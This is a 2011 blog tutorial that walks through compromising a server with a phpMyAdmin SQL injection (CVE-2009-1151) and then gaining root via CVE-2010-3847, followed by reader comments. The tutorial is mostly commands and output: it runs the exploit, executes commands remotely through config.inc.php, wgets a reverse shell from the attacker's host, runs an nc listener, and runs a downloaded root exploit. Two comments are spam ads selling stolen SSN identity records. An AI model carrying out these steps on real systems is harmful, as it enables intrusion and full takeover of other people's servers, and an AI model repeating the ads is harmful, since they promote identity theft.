Friday 11 February 2011

SQL Injection on phpMyAdmin 2.11.4, 2.11.9.3, 2.11.9.4, 3.0.0 and 3.0.1.1

PHPMYADMIN SQL INJECTION
CVE: CVE-2009-1151
Remote: Yes
Local: No

ROOT
CVE-2010-3847
Remote: No
Local: Yes







0) Download the php exploit from http://securityreason.com/exploitalert/6399
    Donwload the get_root exploit from http://seclists.org/fulldisclosure/2010/Oct/257


1) Run the exploit against the target machine.
[root@bt]# ./php_exploit  http://mytargettest.com/phpMyAdmin/

[+] checking if phpMyAdmin exists on URL provided ...
[+] phpMyAdmin cookie and form token received successfully. Good!
[+] attempting to inject phpinfo() ...
[+] success! phpinfo() injected successfully! output saved on /tmp/exploit.29597.phpinfo.flag.html
[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?p=phpinfo();
    please send any feedback/improvements for this script to unknown.pentester<AT_sign__here>gmail.com

2)  Great, that means it worked, now you can type commands on the target machine.
  
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/var
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=cat+/etc/passwd
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=touch+/tmp/test
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=ls+-l+/tmp/test ( Make sure you can write in there and the file is there.

    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=wget+-P+/tmp+http://172.16.1.79/exploits/airwolf_reverse_shell   (Download your rev_shell)

   http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=chmod+777+/tmp/airwolf_reverse_shell  (change the permissions to execute)

3) Now you have your exploit in the target machine ready to run, this exploit is just a reverse shell
   so, in my machine I run this :
   nc -l -p 8080 -vvv

4) Now I execute my reverse shell to connect to my machine
    http://mytargettest.com/phpMyAdmin//config/config.inc.php?c=/tmp/airwolf_reverse_shell
  
5) Great, now you have a shell, next step is get root.
id

6) cd /tmp/ ; mkdir hack ; cd hack
   wget http://172.16.1.79/exploits/get_root
   wget http://172.16.1.79/exploits/payload.c

7) Run the exploit to get root and that's it.
chmod +x ./get_root
./get_root
id

Games over!

15 comments:

  1. Hey man, nice tutorial. I would like to get in touch with you. Do you have an email or messenger?

    ReplyDelete
    Replies
    1. Hello Everyone !

      USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

      All SSN's are Tested & Verified.

      **DETAILS IN LEADS/FULLZ**

      ->FULL NAME
      ->SSN
      ->DATE OF BIRTH
      ->DRIVING LICENSE NUMBER
      ->ADDRESS WITH ZIP
      ->PHONE NUMBER, EMAIL
      ->EMPLOYEE DETAILS

      *Price for SSN lead $2
      *You can ask for sample before any deal
      *If you buy in bulk, will give you discount
      *Sampling is just for serious buyers

      ->Hope for the long term business
      ->You can buy for your specific states too

      **Contact 24/7**

      Whatsapp > +923172721122

      Email > leads.sellers1212@gmail.com

      Telegram > @leadsupplier

      ICQ > 752822040

      Delete
  2. Sure, my email is pochackblog@gmail.com
    I will be posting here soon my ftp so everyone can download all the needed stuff from my ftp.

    ReplyDelete
  3. hey where can i get the get_root exploit from the link?..if you can upload it it somewhere i would greatly appreciate it :) thanks in advance!!!

    ReplyDelete
  4. What's that program's name? Metasploit?

    ReplyDelete
  5. Noup, its just an exploit as I said.

    ReplyDelete
  6. When I write php_exploit it says no such file or directory

    ReplyDelete
  7. You need to download the exploit first.

    ReplyDelete
    Replies
    1. Where from? There isn't a download link on that page... Do you mean you have to create a file and copy/paste the code from that link?

      Delete
  8. i`m really newbie in IT, but i wanna to study like this, couse in my country i dnt have it...dont you wanna give me step by step this tutorial? please email me at rvirgian1@gmail.com

    ReplyDelete
  9. thanks indeed,
    I can't find the right link to download the exploit, would you please give to me.
    N.P the 1st link has been changed to http://cxsecurity.com/exploit
    thanks

    ReplyDelete
  10. i dont really get how to download it

    ReplyDelete
  11. Hello Everyone !

    USA SSN Leads/Fullz available, along with Driving License/ID Number with good connectivity.

    All SSN's are Tested & Verified.

    **DETAILS IN LEADS/FULLZ**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER
    ->ADDRESS WITH ZIP
    ->PHONE NUMBER, EMAIL
    ->EMPLOYEE DETAILS

    *Price for SSN lead $2
    *You can ask for sample before any deal
    *If you buy in bulk, will give you discount
    *Sampling is just for serious buyers

    ->Hope for the long term business
    ->You can buy for your specific states too

    **Contact 24/7**

    Whatsapp > +923172721122

    Email > leads.sellers1212@gmail.com

    Telegram > @leadsupplier

    ICQ > 752822040

    ReplyDelete